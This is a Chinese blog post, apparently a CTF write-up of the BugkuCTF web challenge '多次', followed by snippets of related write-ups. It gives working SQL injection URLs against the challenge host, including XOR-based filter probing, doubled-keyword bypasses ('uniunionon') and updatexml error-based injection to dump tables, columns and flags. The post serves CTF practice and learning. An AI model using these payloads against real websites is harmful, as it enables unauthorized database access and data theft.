BugkuCTF之web题之多次

最新推荐文章于 2024-05-11 02:11:37 发布
最新推荐文章于 2024-05-11 02:11:37 发布
阅读量7.6k 收藏 2
点赞数 6
分类专栏: CTF题 BUGKUCTF 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42967398/article/details/84931839
版权
CTF题 同时被 2 个专栏收录
115 篇文章 16 订阅
订阅专栏
BUGKUCTF
11 篇文章 2 订阅
订阅专栏

BugkuCTF之web题之多次

点击进去发现是:
在这里插入图片描述
看见有个id,一个一个试一试,到id=5时,发现有提示:
在这里插入图片描述
可以确定了,这题是sql注入。

判断一下是什么注入,加上单引号出错,加上#不出错,加上’ and 1=1#又出错了,应该是过滤,这时候我们就要判断一下SQL网站过滤了什么内容,这里有一个很好的方法知道过滤的是什么,使用 异或注入
在id=1后面输入 ‘^(0)^’
发现不出错,那就将0换成1=1
如果出错,那就是成功了
在这里插入图片描述
在这里插入图片描述
发现是可以的。
也就是说,如果括号里面的判断是假的,那么页面就会显示正确
那么同理,如果我修改里面的内容为length(‘union’)!=0
如果页面显示正确,那就证明length(‘union’)是等于0的,也就是union被过滤了
在这里插入图片描述
通过以上的方法可以发现union,select,or,and被过滤了,limit,from没有被过滤。
尝试绕过过滤,既然union这些都是被过滤掉了
那构造ununionion 一旦union被过滤,删除了,那剩下来的还是union,这样就可以起到作用了
在这里插入图片描述
经过测试,用这个方法,确实可以。

最终的payload为
http://123.206.87.240:9004/1ndex.php?id=-1%27%20uniounionn%20selecselectt%201,2%23 发现在2的位置有一个回显
在这里插入图片描述
接下来就是爆库名,爆表,爆列,爆值。。。。

http://123.206.87.240:9004/1ndex.php?id=-1%27uniunionon%20selselectect%201,database()%23
http://123.206.87.240:9004/1ndex.php?id=-1%27uniunionon%20selselectect%201,group_concat(table_name)%20from%20infoorrmation_schema.tables%20where%20table_schema=%22web1002-1%22%23
http://123.206.87.240:9004/1ndex.php?id=-1%27ununionion%20seselectlect%201,%20group_concat(column_name)%20from%20infoorrmation_schema.columns%20where%20table_schema=%27web1002-1%27%20anandd%20table_name=%27flag1%27%23
http://123.206.87.240:9004/1ndex.php?id=-1%27uniunionon%20selselectect%201,flag1%20from%20flag1%23

库名:
在这里插入图片描述
表名:
在这里插入图片描述
两个??肯定查看flag1啦

flag1列名:
在这里插入图片描述
flag1列的值:
在这里插入图片描述
满怀欣喜啊,flag出来啦,赶紧交一波。
错误。。。发现题目:
在这里插入图片描述
难道在address里面??看一下咯!

http://123.206.87.240:9004/1ndex.php?id=-1%27uniunionon%20selselectect%201,address%20from%20flag1%23

发现:
在这里插入图片描述
what???还有下一关???那就继续咯。
点击进入,发现:
在这里插入图片描述
测试时发现暗藏玄机啊,字体是黑色的,坑~~,输入id=1’发现:
在这里插入图片描述
存在SQL注入,并且我们可以从回显中查看哪些被过滤掉了,注意是错误中的显示才是正确的。继续测试看看过滤,发现union,sleep,substr都被过滤掉了
双写无法绕过,大小写无法绕过。
更换函数,利用updatexml报错。

//查表名
http://123.206.87.240:9004/Once_More.php?id=1%27%20and%20updatexml(1,concat(%27~%27,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()),%27~%27),3)%20%23
//查列名
http://123.206.87.240:9004/Once_More.php?id=1%27%20and%20updatexml(1,concat(%27~%27,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=%27flag2%27),%27~%27),3)%20%23
//查值
http://123.206.87.240:9004/Once_More.php?id=1%27%20and%20updatexml(1,concat(%27~%27,(select%20flag2%20from%20flag2),%27~%27),3)%20%23

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
终于得到了flag啊
赶紧交一下,还是不对!!
难道要两个??原来是小写,坑~~
PS:
这个题其实还有一种解法。。
叫啥布尔盲注,这个目前不知道,下次再说吧!!

A_dmins
关注
  • 6
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 11
    评论
专栏目录
Bugku Web CTF-点击一百万次
No Title
12-10 477
Bugku Web CTF-点击一百万次 目打开是一个巨大的cookie,可点击,并且点击100w次后会给flag。当然点是不可能点的,最开始我的思路是写一个js脚本自动点击,后来看别人的解是自己提交表单。 查看网页源码可得这样一段js代码: <script> var clicks=0 $(function() { $("#cookie") ...
Bugku Web CTF-多次
No Title
12-28 224
Bugku Web CTF-多次 看url构造,可控的值为id: http://123.206.87.240:9004/1ndex.php?id=5 尝试不同数字一直到id=5会提示可以在该页面进行SQL注入。 尝试不同的构造: http://123.206.87.240:9004/1ndex.php?id=5' 提示Error,Error,Error!,但双引号不报错: http://123...
bugku_web_多次
weixin_30642305的博客
10-02 182
这道好难啊、、、多谢大佬的wp 整个页面没有任何可以入手的地方,再看URL:http://120.24.86.145:9004/1ndex.php?id=1 太明显的SQL注入了,然后给id多赋值几次,会发现作者又在各种忽悠我们,不过等到id=5的时候他告诉我们"You can do some SQL injection in here." 然后开始各种注入测试啊:   1、加...
2024年最全CTF BugKu平台—(Web篇①)_ctf bugku web(1),金三银四我带你去BAT面试现场
最新发布
2401_84281698的博客
05-11 702
白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上网络安全知识点,真正体系化!即num既不能是数字字符,但是要等于1,我们可以想到用科学计数法表示数字1,既不是纯数字,其值又等于1因此。这里的sign显示是加密的。这里是zMNTA,这里我好几次都是zM开头的 ==结束的,查看源代码。弱密码top1000?是一个弹窗 F12 找到一些线索,估计是编码,看了一下下面的评论知道是Unicode编码。通过url传入what的值,让其等于flag,直接构造url就得到flag。
Bugku web——多次
qq_40481505的博客
10-15 243
打开链接 首先对id尝试注入单引号和双引号,发现都报错 继续测试,发现下面结果: ?id=1' --+ (显示成功) ?id=1" --+ (显示成功) ?id=1' and 1=1 --+ (显示报错) ?id=1" and 1=1 --+ (显示成功) 猜测sql语句使用的是单引号,且对and继续过滤 使用下面代码验证 ?id=1'^(length('and')!=0)^' (显示成功...
bugku web 多次
realstarstarli的博客
09-06 358
多次 在本中采用一般的sql注入语法好像无法实现sql注入,进而能够解决该所以猜测是因为字段被过滤了 异或为逻辑运算,当两个条件相同(同真或同假)时为假,当两个条件不同时为真。 在mysql中异或用^或xor来表示。 当url为http://123.206.87.240:9004/1ndex.php?id=1’^(length(‘and’)!=0)%23 若and的长度为0(即为被过滤),则^(length(‘and’)!=0)为假,表达式就为id=1异或0=1,页面正常 若and的长度为不为0(即
bugku ctf 多次
qq_42777804的博客
08-03 419
打开网站后发现 分别将 id=1 2 3 4 5 有不同的提示,等于6时报错 学到大佬的一个方法, 如何判断过滤了哪些字符? 采用异或注入。 如果括号里面的判断是假的,那么页面就会显示正确 构造 ?id=1'^(length('union')!=0)^' 如果我修改里面的内容为length(‘union’)!=0 如果页面显示正确,...
bugkuctf-WEB
05-04
本文主要针对"bugkuctf-WEB"这一主,结合描述中的CTF菜鸟的解经验分享,深入探讨Web的关键知识点。 首先,我们需要理解Web安全的基础概念。Web应用是基于HTTP/HTTPS协议的,其安全性主要取决于服务器端...
bugku ctf misc wp2.pdf
07-05
bugku ctf misc wp2.pdf
bugku ctf misc wp.pdf
07-05
bugku ctf misc wp.pdf
CTF工具之WEB.zip
10-07
总的来说,这个“CTF工具之WEB.zip”集合了Web安全领域的一系列关键资源,涵盖了从信息收集、漏洞探测到攻击模拟和防御分析等多个环节,对于CTF参赛者或是希望提升Web安全能力的人来说,是一个极其有价值的工具库。...
ctf web培训资料pdf
10-06
通过url访问靶机web站点,观察页面中的功能点,对可能存在漏洞的页面进行探测。 常见的漏洞特征: SQL注入:www.example.com?id=1 文件包含:www.example.com?page=file1.php 文件上传
BugKu-多次
苟有恒,必有三更眠,五更起。
08-06 655
多次链接 http://120.24.86.145:9004 分析 单引号出错 加上%23,发现不出错了 加上' and 1=1%23 又出错了,应该是过滤了 这里学习到一个新知识,如何判断过滤了哪些字符? 采用异或注入。 在id=1后面输入 '(0)' 发现不出错,那就将0换成1=1 如果出错,那就是成功了 如果括号里面的判断是假的,那么...
Bugku 多次
hhh
03-03 1012
一道SQL注入的目,学习了挺多小知识~ 异或注入 如何判断哪些关键字被过滤 无回显使用脚本盲注 很容易观察到,页面的url中有一个参数id=1,尝试改变这个id的值发现页面发生改变,加单引号出现报错,加上--+后又变成正常页面,于是确定需要进行SQL注入; 异或注入(第一关) 用异或符连接的两个条件,如果两个是相同的(比如同对或者同错),那么就返回正确的页面,否则返回错误; 例如: ...
bugku 多次
小白渣的博客
09-14 165
加粗样式 这分为两个关卡,都是sql注入的。第一关是关键字and、or、union、select过滤,第二关是报错注入。 分析 单引号出错 加上%23,发现不出错了 加上' and 1=1%23 又出错了,应该是过滤了 采用异或判断(即相同的条件即为假) 采用异或注入。 在id=1后面输入 '(0)' 发现不出错,那就将0换成1=1 如果出错,那就是成功了 如果括号里面的判断是假的,那么页面...
Bugku的web目(多次)的解
weixin_30556959的博客
03-07 115
这道目我弄了好久,最后问了朋友,然后在朋友的帮助下,将flag找到了 这里写一下解方法,记录一下 一进到这道,看到了php?id=1,就很熟悉,很有可能是一道sql注入的目,肯定是要试一下最简单的测试,(哪怕知道不可能是什么都没有过滤) 单引号出错 多加一个%23,发现不出错了 加上’ and 1=1%23 又出错了,可能是过滤了,但是不知道过滤了什么 这里有一个很好的方法知道过滤...
BugkuCTF web解析
qq_37078651的博客
03-12 2736
1、简单 查看源码F12: 2、计算器 输入发现只能输入一个字符,遂查看源码修改maxlength值或者删掉。 3、web基础$_GET GET请求参数what==flag即可. 4、web基础$_POST 使用工具(我用的是hackbar)发送post请求 参数what=flag。 5、矛盾 $num=$_GET['num']; if(!is_nu...
bugku-Web-多次(异或注入,判断被过滤的关键字)☆
Sea_Sand息禅
12-13 906
进去看到url感觉是sql注入, 加上',报错但是%23不报错,加上'--+,也不报错,说明可以用--+注释 加上' or 1=1--+,报错 尝试' oorr 1=1--+,正常 说明or被过滤了. 那么怎么判断哪些关键字被过滤了呢,这里用到异或注入(同真异假)。 http://120.24.86.145:9004/1ndex.php?id=1'^(length('union')!=0...
BugkuCTF Web部分的几道
Sandra_93的博客
10-22 467
url解码:url编码,由%和数字构成 将代码用url进行解码, var p1 = ‘function checkSubmit(){ var a=document.getElementById(“password”); if(“undefined”!=typeof a){ if(&amp;amp;amp;quot;67d709b2b’; var p2 = ‘aa648cf6e87a7114f1&amp;amp;amp;quot;==a.value) return!...
BugkuCTF 字符?正则?
08-11
BugkuCTF 是一个CTF(Capture The Flag)比赛平台,提供了一系列的网络安全挑战目供参赛者解决。在这个平台上,参赛者需要利用自己的技术和知识,寻找并利用目标系统中的漏洞,获取相应的flag来得分。 关于字符和正则表达式,在CTF比赛中常常会遇到需要处理字符或者利用正则表达式来解的情况。例如,有些目会提供一段加密后的字符串,参赛者需要根据加密算法进行解密,获取隐藏在其中的flag。而在其他目中,可能会给出一段文本,并要求参赛者使用正则表达式来匹配特定的模式或者提取特定的信息。 因此,在BugkuCTF中,对字符处理和正则表达式的理解和熟练应用是非常重要的技能之一。参赛者需要具备对字符编码、字符串操作、基本正则表达式语法等方面的知识,并能够灵活运用这些技巧来解决各种与字符和正则相关的目。
评论 11
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值